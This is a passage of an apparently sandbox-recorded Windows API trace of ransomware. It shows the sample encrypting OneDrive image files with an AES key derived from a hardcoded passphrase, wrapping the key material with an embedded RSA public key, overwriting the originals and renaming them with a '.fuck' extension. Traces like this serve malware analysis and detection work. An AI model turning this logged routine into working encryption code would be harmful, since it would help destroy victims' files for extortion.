pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.766] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.768] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x354, lpOverlapped=0x0) returned 1 [0277.768] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x354, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x360) returned 1 [0277.768] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x360, lpOverlapped=0x0) returned 1 [0277.768] CloseHandle (hObject=0x5d48) returned 1 [0277.768] CloseHandle (hObject=0x5d3c) returned 1 [0277.768] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg"), bFailIfExists=0) returned 1 [0277.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg", dwFileAttributes=0x0) returned 1 [0277.772] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg.gsg")) returned 1 [0277.774] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg.fuck")) returned 1 [0277.775] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.775] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.775] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.775] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.775] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.775] GetLastError () returned 0x0 [0277.775] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg")) returned 0x20 [0277.776] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg", dwFileAttributes=0x80) returned 1 [0277.776] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.778] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.779] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.779] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.782] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.782] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.782] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.782] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.782] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.782] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.782] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c2e0) returned 1 [0277.782] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c2e0, dwCertEncodingType=0x1, pInfo=0x2f35b70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35ba0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35ba8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb9c8) returned 1 [0277.783] CryptEncrypt (in: hKey=0x2fb9c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.783] CryptEncrypt (in: hKey=0x2fb9c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c610*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c610*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.783] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c610*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c610*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.784] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.805] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.805] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.807] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0xec, lpOverlapped=0x0) returned 1 [0277.807] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0xec, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0xf0) returned 1 [0277.807] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0xf0, lpOverlapped=0x0) returned 1 [0277.807] CloseHandle (hObject=0x5d3c) returned 1 [0277.807] CloseHandle (hObject=0x5d48) returned 1 [0277.808] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg"), bFailIfExists=0) returned 1 [0277.811] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg", dwFileAttributes=0x0) returned 1 [0277.811] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg.gsg")) returned 1 [0277.812] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onedrivePremium.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\onedrivepremium.svg.fuck")) returned 1 [0277.814] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.814] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.814] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.814] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.814] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.814] GetLastError () returned 0x0 [0277.814] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg")) returned 0x20 [0277.814] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg", dwFileAttributes=0x80) returned 1 [0277.815] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.816] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.817] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.817] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.820] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.820] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.820] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.820] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.820] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.820] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.820] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c720) returned 1 [0277.821] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c720, dwCertEncodingType=0x1, pInfo=0x2f35eb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35ee0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35ee8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbc08) returned 1 [0277.821] CryptEncrypt (in: hKey=0x2fbc08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.821] CryptEncrypt (in: hKey=0x2fbc08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c368*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c368*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2c368*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c368*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.832] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x5b, lpOverlapped=0x0) returned 1 [0277.835] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x5b, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0277.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0277.835] CloseHandle (hObject=0x5d48) returned 1 [0277.835] CloseHandle (hObject=0x5d3c) returned 1 [0277.836] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg"), bFailIfExists=0) returned 1 [0277.839] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg", dwFileAttributes=0x0) returned 1 [0277.839] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg.gsg")) returned 1 [0277.840] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIcon.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowicon.svg.fuck")) returned 1 [0277.842] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.842] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.842] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.842] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.842] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.842] GetLastError () returned 0x0 [0277.842] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg")) returned 0x20 [0277.842] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg", dwFileAttributes=0x80) returned 1 [0277.843] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.844] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.845] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.845] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.848] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.848] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.848] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.848] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.848] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.848] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.848] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c8b8) returned 1 [0277.848] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c8b8, dwCertEncodingType=0x1, pInfo=0x2f361f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36220*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36228*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fba88) returned 1 [0277.849] CryptEncrypt (in: hKey=0x2fba88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.849] CryptEncrypt (in: hKey=0x2fba88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c3f0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c3f0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.849] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c3f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c3f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.851] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, 